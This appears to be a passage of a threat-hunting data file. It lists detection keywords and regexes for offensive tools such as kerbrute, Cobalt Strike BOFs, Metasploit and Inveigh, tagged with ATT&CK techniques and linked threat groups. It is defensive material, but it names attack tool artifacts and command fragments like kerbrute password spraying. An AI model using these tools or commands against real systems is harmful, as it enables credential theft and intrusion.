"*kerbrute passwordspray *",".{0,1000}kerbrute\spasswordspray\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50353"
"*kerbrute userenum *",".{0,1000}kerbrute\suserenum\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50354"
"*kerbrute userenum *",".{0,1000}kerbrute\suserenum\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50355"
"*kerbrute*bruteforce*",".{0,1000}kerbrute.{0,1000}bruteforce.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50356"
"*kerbrute.go*",".{0,1000}kerbrute\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50357"
"*kerbrute/cmd*",".{0,1000}kerbrute\/cmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50358"
"*kerbrute/util*",".{0,1000}kerbrute\/util.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50359"
"*kerbrute_*.exe*",".{0,1000}kerbrute_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50360"
"*kerbrute_darwin_386*",".{0,1000}kerbrute_darwin_386.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","#linux","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50361"
"*kerbrute_darwin_amd64*",".{0,1000}kerbrute_darwin_amd64.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","#linux","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50362"
"*kerbrute_enum*",".{0,1000}kerbrute_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50363"
"*kerbrute_linux*",".{0,1000}kerbrute_linux.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","#linux","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50364"
"*kerbrute_pass_output_*",".{0,1000}kerbrute_pass_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50365"
"*kerbrute_user_output_*",".{0,1000}kerbrute_user_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50366"
"*kerbrute_userpass_wordlist_*",".{0,1000}kerbrute_userpass_wordlist_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50367"
"*kerbrute_windows*",".{0,1000}kerbrute_windows.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50368"
"*kerbrute_windows_386.exe*",".{0,1000}kerbrute_windows_386\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50369"
"*kerbrute_windows_amd64.exe*",".{0,1000}kerbrute_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50370"
"*kerbrute-master*",".{0,1000}kerbrute\-master.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50371"
"*KerbruteSession*",".{0,1000}KerbruteSession.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50372"
"*kernel_shellcode.asm*",".{0,1000}kernel_shellcode\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50373"
"*kernelcallbacktable.x64*",".{0,1000}kernelcallbacktable\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50374"
"*kernelcallbacktable.x64*",".{0,1000}kernelcallbacktable\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50375"
"*kernelcallbacktable.x86*",".{0,1000}kernelcallbacktable\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50376"
"*kernelcallbacktable.x86*",".{0,1000}kernelcallbacktable\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50377"
"*KernelMii.cna*",".{0,1000}KernelMii\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50378"
"*KernelMii.x64.exe*",".{0,1000}KernelMii\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50379"
"*KernelMii.x64.o*",".{0,1000}KernelMii\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50380"
"*KernelMii.x86.exe*",".{0,1000}KernelMii\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50381"
"*KernelMii.x86.o*",".{0,1000}KernelMii\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50382"
"*Kernel-Suite-Downgrade/Config.xml*",".{0,1000}Kernel\-Suite\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","50383"
"*kevin.tellier@synacktiv.com*",".{0,1000}kevin\.tellier\@synacktiv\.com.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#email","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","50384"
"*KevinJClark/badrats*",".{0,1000}KevinJClark\/badrats.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","50385"
"*Kevin-Robertson/Inveigh*",".{0,1000}Kevin\-Robertson\/Inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","50386"
"*KexMnyvBHcpAfniIdwPEXIgPdlxiUNMrYkSMrnXcdVOYYeoscIbuQssBxijBANhu*",".{0,1000}KexMnyvBHcpAfniIdwPEXIgPdlxiUNMrYkSMrnXcdVOYYeoscIbuQssBxijBANhu.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","50387"
